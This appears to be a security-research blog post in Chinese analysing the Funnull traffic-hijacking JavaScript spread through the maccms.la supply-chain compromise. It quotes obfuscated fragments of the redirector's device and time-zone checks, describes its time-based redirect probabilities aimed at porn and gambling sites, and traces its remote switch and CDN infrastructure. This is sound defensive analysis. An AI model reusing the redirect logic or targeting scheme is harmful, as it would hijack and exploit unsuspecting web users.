<p>Redirector&#x7684;&#x6838;&#x5FC3;&#x903B;&#x8F91;&#x662F;&#x901A;&#x8FC7;&#x591A;&#x91CD;&#x68C0;&#x6D4B;&#x673A;&#x5236;&#xFF08;&#x8BBE;&#x5907;&#x7C7B;&#x578B;&#x3001;&#x9875;&#x9762;&#x5173;&#x952E;&#x8BCD;&#x3001;&#x65F6;&#x533A;&#x3001;&#x8BBF;&#x95EE;&#x65F6;&#x6BB5;&#xFF09;&#x5728;&#x4E0D;&#x540C;&#x65F6;&#x95F4;&#x6BB5;&#x4EE5;&#x4E0D;&#x540C;&#x7684;&#x6982;&#x7387;&#xFF08;&#x5982;&#xFF1A;0-8&#x65F6;&#x52AB;&#x6301;&#x6982;&#x7387;60%-80%&#xFF0C;&#x5176;&#x4ED6;&#x65F6;&#x95F4;50%&#xFF09;&#x5C06;&#x7528;&#x6237;&#x91CD;&#x5B9A;&#x5411;&#x5230;&#x7279;&#x5B9A;&#x7684;&#x8272;&#x60C5;&#xFF0C;&#x535A;&#x5F69;&#xFF0C;&#x8BC8;&#x9A97;&#x7B49;&#x63A8;&#x5E7F;&#xFF0C;&#x5B9E;&#x73B0;&#x6D41;&#x91CF;&#x53D8;&#x73B0;&#x3002;</p>
<p>Funnull&#x7684;Redirector&#x6709;&#x975E;&#x5E38;&#x660E;&#x663E;&#x7684;&#x98CE;&#x683C;&#xFF0C;&#x901A;&#x5E38;&#x4F1A;&#x5224;&#x65AD;&#x8BBE;&#x5907;&#x7C7B;&#x578B;&#x6765;&#xFF0C;&#x4E00;&#x822C;&#x53EA;&#x5BF9;&#x624B;&#x673A;&#x6216;&#x5E73;&#x677F;&#x8FD9;&#x7C7B;&#x79FB;&#x52A8;&#x7AEF;&#x4E0B;&#x624B;&#xFF0C;PC&#x6D41;&#x91CF;&#x4EF7;&#x503C;&#x4F4E;&#x3001;&#x8F6C;&#x5316;&#x7387;&#x5DEE;&#x4E14;&#x5BB9;&#x6613;&#x88AB;&#x7BA1;&#x7406;&#x5458;/&#x5B89;&#x5168;&#x8F6F;&#x4EF6;&#x53D1;&#x73B0;&#x3002;</p>
<pre><code>
  var ismobile = navigator.userAgent.match(
  /(phone|pad|pod|iPhone|iPod|ios|iPad
  |Android|Mobile|BlackBerry|IEMobile|
  MQQBrowser|JUC|Fennec|wOSBrowser|
  BrowserNG|WebOS|Symbian|Windows Phone)
  /i);
  
    function isPc() {
    try {
      var _0x32df76 = navigator.platform == &quot;Win32&quot; || 
      navigator.platform == &quot;Windows&quot;;
      var _0x508d68 = navigator.platform == &quot;Mac68K&quot; || 
      navigator.platform == &quot;MacPPC&quot; || 
      navigator.platform == &quot;Macintosh&quot; || 
      navigator.platform == &quot;MacIntel&quot;;
      if (_0x508d68 || _0x32df76) {
        return true;
      } else {
        return false;
      }
    } catch (_0x2decf9) {
      return false;
    }
  }

</code></pre>
<p>&#x518D;&#x6839;&#x636E;&#x9875;&#x9762;&#x5185;&#x5BB9;&#x5BF9;&#x7528;&#x6237;&#x8FDB;&#x884C;&#x521D;&#x6B65;&#x753B;&#x50CF;&#xFF0C;&#x8BC4;&#x4F30;&#x5176;&#x6F5C;&#x5728;&#x5546;&#x4E1A;&#x4EF7;&#x503C;&#xFF0C;&#x5E76;&#x5B9E;&#x65BD;&#x5DEE;&#x5F02;&#x5316;&#x5BFC;&#x6D41;&#x7B56;&#x7565;&#xFF0C;&#x7B80;&#x5355;&#x6765;&#x8BF4;&#xFF0C;&#x6B63;&#x7ECF;&#x7528;&#x6237;&#xFF0C;&#x5F15;&#x8BF1;&#x770B;&#x70B9;&#x8272;&#x60C5;&#xFF0C;&#x601D;&#x60F3;&#x6ED1;&#x5761;&#x597D;&#x4E0B;&#x624B;&#xFF1B;&#x4E0D;&#x592A;&#x6B63;&#x7ECF;&#x7684;&#x7528;&#x6237;&#xFF0C;&#x52A0;&#x5927;&#x5242;&#x91CF;&#xFF0C;&#x69A8;&#x5E72;&#x4EF7;&#x503C;&#x3002;</p>
<h4 id="%E6%AD%A3%E7%BB%8F%E7%94%A8%E6%88%B7%EF%BC%88%E4%BD%8E%E4%BB%B7%E5%80%BC%E6%B5%81%E9%87%8F%EF%BC%89">&#x6B63;&#x7ECF;&#x7528;&#x6237;&#xFF08;&#x4F4E;&#x4EF7;&#x503C;&#x6D41;&#x91CF;&#xFF09;</h4>
<ul>
<li>
<p>&#x753B;&#x50CF;&#xFF1A;&#x5F53;&#x524D;&#x8BBF;&#x95EE;&#x7684;&#x662F;&#x4E3B;&#x6D41;&#x6B63;&#x5E38;&#x5185;&#x5BB9;&#x9875;&#x9762;&#xFF08;&#x65E0;&#x660E;&#x663E;&#x7070;&#x9ED1;&#x5173;&#x952E;&#x8BCD;&#xFF09;&#x3002;&#x8FD9;&#x7C7B;&#x7528;&#x6237;&#x521D;&#x59CB;&#x8B66;&#x60D5;&#x6027;&#x8F83;&#x9AD8;&#x3001;&#x4ED8;&#x8D39;&#x610F;&#x613F;&#x8F83;&#x4F4E;&#x3001;&#x8F6C;&#x5316;&#x5468;&#x671F;&#x8F83;&#x957F;&#x3002;</p>
</li>
<li>
<p>&#x7B56;&#x7565;&#xFF1A;&#x4F18;&#x5148;&#x63A8;&#x9001;&#x5165;&#x95E8;&#x7EA7;&#x8272;&#x60C5;&#x3001;&#x64E6;&#x8FB9;&#x6216;&#x8F7B;&#x5EA6;&#x798F;&#x5229;&#x5185;&#x5BB9;&#xFF0C;&#x901A;&#x8FC7;&#x964D;&#x4F4E;&#x5FC3;&#x7406;&#x95E8;&#x69DB;&#x3001;&#x6FC0;&#x53D1;&#x597D;&#x5947;&#x5FC3;&#xFF0C;&#x9010;&#x6B65;&#x5F15;&#x5BFC;&#x5176;&#x5411;&#x66F4;&#x6DF1;&#x5EA6;&#x7684;&#x6D88;&#x8D39;&#x573A;&#x666F;&#xFF0C;&#x6700;&#x7EC8;&#x5B9E;&#x73B0;&#x8F6C;&#x5316;&#x3002;</p>
</li>
</ul>
<h4 id="%E9%9D%9E%E6%AD%A3%E7%BB%8F%E7%94%A8%E6%88%B7%EF%BC%88%E9%AB%98%E4%BB%B7%E5%80%BC%E6%B5%81%E9%87%8F%EF%BC%89">&#x975E;&#x6B63;&#x7ECF;&#x7528;&#x6237;&#xFF08;&#x9AD8;&#x4EF7;&#x503C;&#x6D41;&#x91CF;&#xFF09;</h4>
<ul>
<li>
<p>&#x753B;&#x50CF;&#xFF1A;&#x5F53;&#x524D;&#x8BBF;&#x95EE;&#x7684;&#x662F;&#x8272;&#x60C5;&#x3001;&#x535A;&#x5F69;&#x3001;&#x516D;&#x5408;&#x5F69;&#x3001;&#x798F;&#x5229;&#x5BFC;&#x822A;&#x3001;&#x6210;&#x4EBA;&#x76F4;&#x64AD;&#x7B49;&#xFF08;&#x5305;&#x542B;&#x5927;&#x91CF;&#x5BF9;&#x5E94;&#x5173;&#x952E;&#x8BCD;&#xFF09;&#x3002;&#x8FD9;&#x7C7B;&#x7528;&#x6237;&#x5DF2;&#x6709;&#x660E;&#x786E;&#x9700;&#x6C42;&#x3001;&#x4ED8;&#x8D39;&#x610F;&#x613F;&#x8F83;&#x5F3A;&#x3001;&#x5BF9;&#x5E73;&#x53F0;&#x5B9E;&#x529B;&#x4E0E;&#x5185;&#x5BB9;&#x523A;&#x6FC0;&#x5EA6;&#x654F;&#x611F;&#x3001;&#x8F6C;&#x5316;&#x5468;&#x671F;&#x77ED;&#x3002;</p>
</li>
<li>
<p>&#x7B56;&#x7565;&#xFF1A;&#x76F4;&#x63A5;&#x5339;&#x914D;&#x66F4;&#x4E0A;&#x6E38;&#x3001;&#x66F4;&#x4E13;&#x4E1A;&#x3001;&#x8D44;&#x91D1;&#x66F4;&#x96C4;&#x539A;&#x3001;&#x73A9;&#x6CD5;&#x66F4;&#x523A;&#x6FC0;&#x7684;&#x5E73;&#x53F0;&#xFF0C;&#x63D0;&#x4F9B;&#x9AD8;&#x54C1;&#x8D28;&#x5185;&#x5BB9;&#x4E0E;&#x66F4;&#x9AD8;&#x56DE;&#x62A5;&#x673A;&#x5236;&#xFF0C;&#x52A0;&#x901F;&#x7528;&#x6237;&#x6C89;&#x8FF7;&#x5E76;&#x6700;&#x5927;&#x5316;&#x5355;&#x7528;&#x6237;&#x4EA7;&#x51FA;&#xFF08;&#x6CE8;&#x518C;&#x3001;&#x9996;&#x5B58;&#x3001;&#x6301;&#x7EED;&#x6D88;&#x8D39;&#x7B49;&#xFF09;&#x3002;</p>
</li>
</ul>
<p>&#x7B56;&#x7565;&#x786E;&#x5B9A;&#x540E;&#xFF0C;&#x518D;&#x6839;&#x636E;&#x5F53;&#x524D;&#x65F6;&#x95F4;&#x6BB5;&#x52A8;&#x6001;&#x8C03;&#x6574;&#x8DF3;&#x8F6C;&#x6982;&#x7387;&#xFF0C;&#x5145;&#x5206;&#x5229;&#x7528;&#x7528;&#x6237;&#x5728;&#x4E0D;&#x540C;&#x65F6;&#x6BB5;&#x7684;&#x5FC3;&#x7406;&#x72B6;&#x6001;&#x4E0E;&#x884C;&#x4E3A;&#x7279;&#x5F81;&#xFF0C;&#x5B9E;&#x73B0;&#x66F4;&#x9AD8;&#x6548;&#x7684;&#x6D41;&#x91CF;&#x53D8;&#x73B0;&#xFF1A;</p>
<ul>
<li>00:00&#x2013;01:59&#xFF0C;&#x8DF3;&#x8F6C;&#x6982;&#x7387; 60%&#x3002;&#x7528;&#x6237;&#x521A;&#x8FDB;&#x5165;&#x6DF1;&#x591C;&#xFF0C;&#x8B66;&#x60D5;&#x6027;&#x5F00;&#x59CB;&#x4E0B;&#x964D;&#xFF0C;&#x4F46;&#x591A;&#x6570;&#x4EBA;&#x5C1A;&#x672A;&#x5B8C;&#x5168;&#x653E;&#x677E;&#xFF0C;&#x9002;&#x5408;&#x9002;&#x5EA6;&#x653E;&#x91CF;&#x3002;</li>
<li>02:00&#x2013;03:59&#xFF0C;&#x8DF3;&#x8F6C;&#x6982;&#x7387; 70%&#x3002;&#x6DF1;&#x5EA6;&#x591C;&#x95F4;&#x9636;&#x6BB5;&#xFF0C;&#x7528;&#x6237;&#x51B3;&#x7B56;&#x529B;&#x4E0E;&#x81EA;&#x63A7;&#x529B;&#x663E;&#x8457;&#x51CF;&#x5F31;&#xFF0C;&#x51B2;&#x52A8;&#x6D88;&#x8D39;&#x610F;&#x613F;&#x4E0A;&#x5347;&#xFF0C;&#x662F;&#x7834;&#x9632;&#x4E0E;&#x8F6C;&#x5316;&#x7684;&#x9EC4;&#x91D1;&#x7A97;&#x53E3;&#x3002;</li>
<li>04:00&#x2013;06:59&#xFF1A;&#x8DF3;&#x8F6C;&#x6982;&#x7387; 80%&#x3002;&#x51CC;&#x6668;&#x9AD8;&#x5CF0;&#x671F;&#xFF0C;&#x7528;&#x6237;&#x75B2;&#x60EB;&#x3001;&#x5B64;&#x72EC;&#x611F;&#x5F3A;&#x3001;&#x8B66;&#x60D5;&#x6027;&#x6700;&#x4F4E;&#xFF0C;&#x5BF9;&#x8272;&#x60C5;/&#x535A;&#x5F69;&#x5185;&#x5BB9;&#x7684;&#x63A5;&#x53D7;&#x5EA6;&#x4E0E;&#x4ED8;&#x8D39;&#x51B2;&#x52A8;&#x8FBE;&#x5230;&#x5CF0;&#x503C;&#xFF0C;&#x6B64;&#x65F6;&#x6295;&#x653E;&#x5F3A;&#x5EA6;&#x6700;&#x5927;&#xFF0C;&#x8F6C;&#x5316;&#x6548;&#x7387;&#x6700;&#x9AD8;&#x3002;</li>
<li>07:00&#x2013;07:59&#xFF1A;&#x8DF3;&#x8F6C;&#x6982;&#x7387;&#x56DE;&#x843D;&#x81F3; 60%&#x3002;&#x6E05;&#x6668;&#x65F6;&#x6BB5;&#xFF0C;&#x7528;&#x6237;&#x5F00;&#x59CB;&#x6E05;&#x9192;&#xFF0C;&#x8B66;&#x60D5;&#x6027;&#x56DE;&#x5347;&#xFF0C;&#x6295;&#x653E;&#x5F3A;&#x5EA6;&#x9002;&#x5F53;&#x6536;&#x655B;&#xFF0C;&#x907F;&#x514D;&#x5E72;&#x6270;&#x6B63;&#x5E38;&#x4F5C;&#x606F;&#x5BFC;&#x81F4;&#x4E3E;&#x62A5;&#x6216;&#x6D41;&#x5931;&#x3002;</li>
<li>&#x5176;&#x4ED6;&#x65F6;&#x95F4;&#xFF08;&#x767D;&#x5929; 08:00&#x2013;23:59&#xFF09;&#xFF1A;&#x57FA;&#x7840;&#x6982;&#x7387; 50%&#x3002;&#x767D;&#x5929;&#x7528;&#x6237;&#x6D3B;&#x8DC3;&#x5EA6;&#x9AD8;&#x4F46;&#x8B66;&#x60D5;&#x6027;&#x5F3A;&#xFF0C;&#x4FDD;&#x6301;&#x4E2D;&#x7B49;&#x6982;&#x7387;&#x6295;&#x653E;&#x3002;</li>
</ul>
<p>Redirector&#x8FD8;&#x6709;&#x65F6;&#x533A;&#x68C0;&#x6D4B;&#x673A;&#x5236;&#xFF0C;&#x53EA;&#x6709;&#x7684;&#x7279;&#x5B9A;&#x5730;&#x533A;&#x624D;&#x4F1A;&#x89E6;&#x53D1;&#x8DF3;&#x8F6C;&#xFF0C;&#x4ECE;&#x6355;&#x83B7;&#x7684;&#x6837;&#x672C;&#x6765;&#x770B;&#xFF0C;&#x76EE;&#x524D;&#x53EA;&#x9488;&#x5BF9;&#x4E2D;&#x56FD;&#x3002;</p>
<pre><code>    var _0x326fff = _0x1ec843.getHours();
    var _0x16beb8 = Intl.DateTimeFormat().resolvedOptions().timeZone;
    const _0x43a7e6 = [ &quot;Asia/Shanghai&quot;, 
                        &quot;Asia/Chongqing&quot;, 
                        &quot;Asia/Harbin&quot;, 
                        &quot;Asia/Urumqi&quot;, 
                        &quot;Asia/Kashgar&quot;, 
                        &quot;Asia/Beijing&quot;];
    if (_0x43a7e6.includes(_0x16beb8)) { ... }
    
</code></pre>
<p>&#x5F53;&#x4E0A;&#x9762;&#x7684;&#x6761;&#x4EF6;&#x90FD;&#x6EE1;&#x8DB3;&#x65F6;&#xFF0C;&#x8FD8;&#x6709;&#x4E00;&#x9053;&#x5173;&#x5361;&#xFF0C;Funnull&#x8BBE;&#x8BA1;&#x4E86;&#x4E00;&#x9053;&#x8FDC;&#x7A0B;&#x63A7;&#x5236;&#x5F00;&#x5173;&#xFF1A;&#x901A;&#x8FC7;&#x52A8;&#x6001;&#x52A0;&#x8F7D;&#x5916;&#x90E8;JavaScript&#x6587;&#x4EF6;&#x6765;&#x8BBE;&#x7F6E;usercache&#x53D8;&#x91CF;&#xFF0C;&#x53EA;&#x6709;&#x8BE5;&#x53D8;&#x91CF;&#x4E3A;true&#x65F6;&#x624D;&#x5141;&#x8BB8;&#x6267;&#x884C;&#x8DF3;&#x8F6C;&#xFF0C;&#x4ECE;&#x800C;&#x5B9E;&#x73B0;&#x653B;&#x51FB;&#x884C;&#x4E3A;&#x7684;&#x8FDC;&#x7A0B;&#x64CD;&#x63A7;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_checkcache.png" alt="ring_checkcache.png" loading="lazy"></p>
<p>&#x8FD9;&#x4E9B;&#x884C;&#x4E3A;&#x662F;Funnull Redirector&#x7C7B;&#x811A;&#x672C;&#x7684;&#x5178;&#x578B;&#x7279;&#x5F81;&#x3002;&#x672C;&#x6B21;&#x4E8B;&#x4EF6;&#x6355;&#x83B7;&#x7684; JS &#x811A;&#x672C;&#x5728;&#x6574;&#x4F53;&#x7F16;&#x7801;&#x98CE;&#x683C;&#x3001;&#x6DF7;&#x6DC6;&#x6280;&#x672F;&#x53CA;&#x6838;&#x5FC3;&#x903B;&#x8F91;&#x8BBE;&#x8BA1;&#x4E0A;&#xFF0C;&#x4E0E;&#x4E4B;&#x524D;&#x6570;&#x6B21;&#x6295;&#x6BD2;&#x6D3B;&#x52A8;&#x4E2D;&#x7684;&#x6837;&#x672C;&#x51E0;&#x4E4E;&#x5B8C;&#x5168;&#x4E00;&#x81F4;&#xFF0C;<strong>&#x5448;&#x73B0;&#x51FA;&#x660E;&#x663E;&#x7684;&#x5BB6;&#x65CF;&#x540C;&#x6E90;&#x6027;</strong>&#xFF0C;&#x4EE5;GoEdge&#x4E8B;&#x4EF6;&#x7684;&#x811A;&#x672C;&#xFF0C;&#x4EE5;&#x53CA;&#x672C;&#x6B21;RingH23&#x653B;&#x51FB;&#x5957;&#x4EF6;&#x6295;&#x9012;&#x7684;&#x6837;&#x672C;&#x4E3A;&#x4F8B;&#xFF0C;&#x4FE9;&#x8005;&#x8FD1;&#x4F3C;&#x7684;&#x98CE;&#x683C;&#x4E00;&#x76EE;&#x4E86;&#x7136;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_cpid.png" alt="ring_cpid.png" loading="lazy"></p>
<p>&#x53E6;&#x4E00;&#x4E2A;&#x66F4;&#x4E3A;&#x76F4;&#x63A5;&#x7684;&#x8BC1;&#x636E;&#x662F;&#xFF0C;&#x5728;&#x672C;&#x6B21;&#x6D3B;&#x52A8;&#x4E2D;&#x5145;&#x5F53;&#x8FDC;&#x7A0B;&#x63A7;&#x5236;&#x5F00;&#x5173;&#x89D2;&#x8272;&#x7684;ailyunoss.com&#xFF08;&#x4EFF;&#x5192;&#x963F;&#x91CC;&#x4E91;&#xFF09;&#x4E8E;2025&#x5E74;4&#x6708;24&#x65E5;&#x88AB;&#x6CE8;&#x518C;&#xFF0C;&#x5B83;&#x7684;DNS&#x89E3;&#x6790;&#x5386;&#x53F2;&#x6E05;&#x6670;&#x5730;&#x663E;&#x793A;&#xFF0C;&#x5728;2025&#x5E74;5&#x6708;22&#x65E5;&#x81F3;7&#x6708;9&#x65E5;&#x671F;&#x95F4;&#xFF0C;&#x8BE5;&#x57DF;&#x540D;&#x4F7F;&#x7528;&#x4E86;funnull&#x7CFB;&#x5217;CDN&#x670D;&#x52A1;&#x3002;<strong>&#x8FD9;&#x4E00;&#x53D1;&#x73B0;&#x76F4;&#x63A5;&#x8BC1;&#x660E;&#x4E86;RingH23&#x653B;&#x51FB;&#x5957;&#x4EF6;&#x4EE5;&#x53CA;maccms.la&#x7684;&#x6295;&#x6BD2;&#x653B;&#x51FB;&#xFF0C;&#x4E0E;FUNNULL&#x9ED1;&#x4EA7;&#x56E2;&#x4F19;&#x5B58;&#x5728;&#x660E;&#x786E;&#x5173;&#x8054;&#x3002;</strong></p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_aily.png" alt="ring_aily.png" loading="lazy"></p>
<h2 id="0x2-%E5%8F%AF%E7%96%91%E7%9A%84cdn1ai">0x2: &#x53EF;&#x7591;&#x7684;cdn1.ai</h2>
<p>Funnull&#x7528;&#x4E8E;&#x6258;&#x7BA1;&#x7684;&#x6076;&#x610F;javascript&#x811A;&#x672C;&#x7684;&#x57DF;&#x540D;&#x76EE;&#x524D;&#x6B63;&#x5728;&#x4F7F;&#x7528;&#x57FA;&#x4E8E;cdn1.ai&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x7684;CDN&#x670D;&#x52A1;&#x3002;cdn1.ai&#x4E8E;2025&#x5E74;6&#x6708;18&#x65E5;&#x521B;&#x5EFA;&#xFF0C;&#x5B98;&#x65B9;&#x7F51;&#x7AD9;&#x5BA3;&#x79F0;&#x5B83;&#x662F;&#x5168;&#x7403;&#x5185;&#x5BB9;&#x5206;&#x53D1;&#x7F51;&#x7EDC;&#xFF0C;&#x63D0;&#x4F9B;&#x9AD8;&#x901F;&#x3001;&#x7A33;&#x5B9A;&#x7684;&#x5185;&#x5BB9;&#x52A0;&#x901F;&#x670D;&#x52A1;&#xFF0C;&#x8986;&#x76D6;200+&#x8282;&#x70B9;&#xFF0C;&#x63D0;&#x5347;&#x7F51;&#x7AD9;&#x8BBF;&#x95EE;&#x901F;&#x5EA6;95%&#x4EE5;&#x4E0A;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_cdn1.png" alt="ring_cdn1.png" loading="lazy"></p>
<p>&#x6211;&#x4EEC;&#x6839;&#x636E;CNAME&#x8BB0;&#x5F55;&#x5BF9;JS&#x6076;&#x610F;&#x57DF;&#x540D;&#x8FDB;&#x884C;&#x5206;&#x7C7B;&#xFF0C;&#x5386;&#x53F2;&#x6D3B;&#x52A8;&#x4E2D;&#x51FA;&#x73B0;&#x7684;&#x57DF;&#x540D;&#x53EF;&#x4EE5;&#x5F88;&#x660E;&#x663E;&#x770B;&#x51FA;&#x4ECE;funnull cdn&#x5230;cdn1.ai&#x7684;&#x8F6C;&#x79FB;&#x8FC7;&#x7A0B;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_old.png" alt="ring_old.png" loading="lazy"></p>
<p>&#x5C06;&#x672C;&#x6B21;&#x6D3B;&#x52A8;&#x6D89;&#x53CA;&#x57DF;&#x540D;&#x4E0E;&#x5386;&#x53F2;&#x653B;&#x51FB;&#x6D3B;&#x52A8;&#x4E2D;&#x4F7F;&#x7528;&#x7684;&#x57DF;&#x540D;&#x8FDB;&#x884C;&#x6A2A;&#x5411;&#x5BF9;&#x6BD4;&#x5206;&#x6790;&#xFF0C;&#x53EF;&#x4EE5;&#x53D1;&#x73B0;&#x8FD9;&#x4E9B;&#x57DF;&#x540D;&#x90FD;&#x5728;&#x76F8;&#x8FD1;&#x7684;&#x65F6;&#x95F4;&#x7A97;&#x53E3;&#xFF08;&#x96C6;&#x4E2D;&#x5728;7&#x6708;&#x671F;&#x95F4;&#xFF09;&#x5B8C;&#x6210;&#x4E86;&#x5411;cdn1.ai&#x7684;&#x8FC1;&#x79FB;&#x64CD;&#x4F5C;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_cnamemove.png" alt="ring_cnamemove.png" loading="lazy"></p>
<p>&#x8FD9;&#x4E0D;&#x7981;&#x4EE4;&#x4EBA;&#x4EA7;&#x751F;&#x4E00;&#x4E2A;&#x7591;&#x95EE;&#xFF1A;&#x4F5C;&#x4E3A;&#x4E00;&#x5BB6;&#x65B0;&#x5174;&#x7684;CDN&#x670D;&#x52A1;&#x5546;&#xFF0C;CDN1.AI&#x662F;&#x5982;&#x4F55;&#x5728;&#x5982;&#x6B64;&#x77ED;&#x7684;&#x65F6;&#x95F4;&#x5185;&#xFF0C;&#x8D62;&#x5F97;&#x50CF;Funnull&#x8FD9;&#x7C7B;&#x6210;&#x719F;&#x9ED1;&#x4EA7;&#x7EC4;&#x7EC7;&#x4FE1;&#x4EFB;&#x7684;&#xFF1F;&#x5BF9;&#x4E8E;&#x65E5;&#x8FDB;&#x6597;&#x91D1;&#x7684;Funnull&#x800C;&#x8A00;&#xFF0C;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x7684;&#x9009;&#x62E9;&#x5FC5;&#x5B9A;&#x614E;&#x4E4B;&#x53C8;&#x614E;&#xFF0C;&#x5BF9;&#x7A33;&#x5B9A;&#x6027;&#x6709;&#x6BD4;&#x8F83;&#x9AD8;&#x7684;&#x8981;&#x6C42;&#x3002;&#x7136;&#x800C;&#xFF0C;CDN1.AI&#x672C;&#x8EAB;&#x7684;&#x8868;&#x73B0;&#x5374;&#x663E;&#x5F97;&#x5E76;&#x4E0D;&#x662F;&#x90A3;&#x4E48;&#x53EF;&#x9760;&#xFF0C;&#x5B83;&#x7684;&#x6280;&#x672F;&#x67B6;&#x6784;&#x6E90;&#x81EA;&#x4E8E;&#x5F00;&#x6E90;&#x9879;&#x76EE;GoEdge&#xFF0C;&#x76F4;&#x63A5;&#x7528;&#x4E8E;&#x6B63;&#x89C4;&#x7684;&#x5546;&#x4E1A;&#x73AF;&#x5883;&#x5148;&#x5929;&#x5C31;&#x529B;&#x6709;&#x4E0D;&#x902E;&#xFF1B;&#x518D;&#x8005;&#x8FD0;&#x8425;&#x4E5F;&#x4E0D;&#x662F;&#x5F88;&#x4E13;&#x4E1A;&#xFF0C;&#x4F8B;&#x5982;&#x5176;&#x5B98;&#x65B9;&#x7F51;&#x7AD9;&#x7684;SSL&#x8BC1;&#x4E66;&#x8FC7;&#x671F;&#x90FD;&#x672A;&#x80FD;&#x53CA;&#x65F6;&#x66F4;&#x65B0;&#xFF0C;&#x8FD9;&#x663E;&#x7136;&#x4E0D;&#x7B26;&#x5408;&#x4E00;&#x5BB6;&#x7A33;&#x5065;&#x670D;&#x52A1;&#x5546;&#x5E94;&#x6709;&#x7684;&#x8868;&#x73B0;&#x3002;</p>
<p>&#x6211;&#x4EEC;&#x76EE;&#x524D;&#x5C1A;&#x672A;&#x53D1;&#x73B0;&#x80FD;&#x591F;&#x76F4;&#x63A5;&#x8BC1;&#x660E;CDN1.AI&#x4E0E;Funnull&#x56E2;&#x4F19;&#x5B58;&#x5728;&#x5F52;&#x5C5E;&#x5173;&#x7CFB;&#x7684;&#x8BC1;&#x636E;&#xFF0C;&#x4F46;&#x7EFC;&#x5408;&#x5176;&#x5FEB;&#x901F;&#x83B7;&#x5F97;&#x4FE1;&#x4EFB;&#x7684;&#x5F02;&#x5E38;&#x6A21;&#x5F0F;&#x3001;&#x81EA;&#x8EAB;&#x8FD0;&#x7EF4;&#x7684;&#x8349;&#x7387;&#x8868;&#x73B0;&#xFF0C;&#x4EE5;&#x53CA;&#x4E0E;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x9AD8;&#x5EA6;&#x540C;&#x6B65;&#x7684;&#x8FC1;&#x79FB;&#x65F6;&#x673A;&#xFF0C;&#x73B0;&#x505A;&#x4E00;&#x6280;&#x672F;&#x63A8;&#x6D4B;&#xFF1A;<strong>CDN1.AI&#x5F88;&#x53EF;&#x80FD;&#x5E76;&#x975E;&#x771F;&#x6B63;&#x7684;&#x7B2C;&#x4E09;&#x65B9;CDN&#xFF0C;&#x800C;&#x662F;Funnull&#x56E2;&#x4F19;&#x4E3A;&#x89C4;&#x907F;&#x8FFD;&#x8E2A;&#x800C;&#x542F;&#x7528;&#x7684;&#x65B0;&#x9A6C;&#x7532;</strong>&#x3002;</p>
<h1 id="maccmsla%E5%AE%98%E6%96%B9%E6%8A%95%E6%AF%92%E6%8A%80%E6%9C%AF%E7%BB%86%E8%8A%82">maccms.la&#x5B98;&#x65B9;&#x6295;&#x6BD2;&#x6280;&#x672F;&#x7EC6;&#x8282;</h1>
<p><a href="https://github.com/magicblack/maccms10?ref=blog.xlab.qianxin.com">&#x82F9;&#x679C;CMS</a>&#x662F;&#x4E00;&#x5957;&#x57FA;&#x4E8E;PHP&#x548C;MySQL&#x5F00;&#x53D1;&#x3001;&#x514D;&#x8D39;&#x5F00;&#x6E90;&#x7684;&#x4E13;&#x4E1A;&#x5F71;&#x89C6;&#x5185;&#x5BB9;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF;&#xFF0C;&#x4E3B;&#x8981;&#x7528;&#x4E8E;&#x5FEB;&#x901F;&#x642D;&#x5EFA;&#x4E0E;&#x7BA1;&#x7406;&#x5404;&#x7C7B;&#x89C6;&#x9891;&#x7AD9;&#x70B9;&#xFF0C;&#x5982;&#x7535;&#x5F71;&#x7AD9;&#x3001;&#x7535;&#x89C6;&#x5267;&#x7AD9;&#x6216;&#x52A8;&#x6F2B;&#x8D44;&#x6E90;&#x7AD9;&#x7B49;&#x3002;&#x51ED;&#x501F;&#x5176;&#x4FBF;&#x6377;&#x7684;&#x91C7;&#x96C6;&#x529F;&#x80FD;&#x4E0E;&#x7075;&#x6D3B;&#x7684;&#x6A21;&#x677F;&#x7CFB;&#x7EDF;&#xFF0C;&#x8BE5;&#x7CFB;&#x7EDF;&#x81EA;&#x53D1;&#x5E03;&#x4EE5;&#x6765;&#x4E00;&#x76F4;&#x6DF1;&#x53D7;&#x4E2D;&#x5C0F;&#x578B;&#x5F71;&#x89C6;&#x7AD9;&#x957F;&#x7684;&#x6B22;&#x8FCE;&#xFF0C;&#x5E7F;&#x6CDB;&#x5E94;&#x7528;&#x4E8E;&#x4E2A;&#x4EBA;&#x53CA;&#x5C0F;&#x89C4;&#x6A21;&#x5546;&#x4E1A;&#x89C6;&#x9891;&#x5E73;&#x53F0;&#x5EFA;&#x8BBE;&#x4E2D;&#x3002;&#x6700;&#x521D;&#x5B98;&#x65B9;&#x7EF4;&#x62A4;&#x7684;&#x7248;&#x672C;&#xFF08;&#x539F;&#x5B98;&#x7F51;&#x4E3A;maccms.com&#xFF09;&#x5DF2;&#x4E8E;2019&#x5E74;&#x524D;&#x540E;&#x505C;&#x6B62;&#x66F4;&#x65B0;&#x3002;&#x6B64;&#x540E;&#xFF0C;&#x4E00;&#x4E2A;&#x88AB;&#x79F0;&#x4E3A;&#x201C;maccms.la&#x201D;&#x7684;&#x793E;&#x533A;&#x7248;&#x672C;&#x5F00;&#x59CB;&#x63D0;&#x4F9B;&#x66F4;&#x65B0;&#x4E0E;&#x652F;&#x6301;&#xFF0C;&#x76EE;&#x524D;&#x5728;GitHub&#x4E0A;&#x7684;&#x76F8;&#x5173;&#x9879;&#x76EE;&#x5DF2;&#x79EF;&#x7D2F;&#x8D85;&#x8FC7;2700&#x4E2A;&#x661F;&#x6807;&#xFF0C;&#x4F53;&#x73B0;&#x51FA;&#x8F83;&#x4E3A;&#x6D3B;&#x8DC3;&#x7684;&#x793E;&#x533A;&#x751F;&#x6001;&#x4E0E;&#x7528;&#x6237;&#x8BA4;&#x53EF;&#x5EA6;&#x3002;</p>
